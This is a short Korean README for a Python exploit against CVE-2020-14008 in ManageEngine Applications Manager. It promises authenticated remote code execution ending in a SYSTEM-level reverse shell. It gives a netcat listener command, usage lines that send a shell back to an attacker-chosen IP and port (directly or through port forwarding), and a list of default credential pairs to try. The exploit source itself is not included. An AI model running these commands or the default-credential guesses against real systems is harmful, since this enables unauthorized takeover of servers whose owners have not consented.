
ManageEngine Applications Manager의 CVE-2020-14008에 대한 Python 익스플로잇으로, 인증된 원격 코드 실행을 통해 SYSTEM 수준의 리버스 셸을 제공합니다.
이 스크립트는 ManageEngine Applications Manager의 CVE-2020-14008 취약점을 악용하여 SYSTEM 권한으로 리버스 셸을 획득합니다.
pip3 install requests urllib3
nc -nlvp 9001
python3 cve-2020-14008-exploit.py <target_url> <username> <password> <your_ip> <your_port>
# Direct attack
python3 cve-2020-14008-exploit.py https://192.168.1.100:8443 admin admin 192.168.1.50 9001
# Through port forwarding
python3 cve-2020-14008-exploit.py https://localhost:8443 admin admin 127.0.0.1 9001
admin:adminadministrator:administratorguest:guest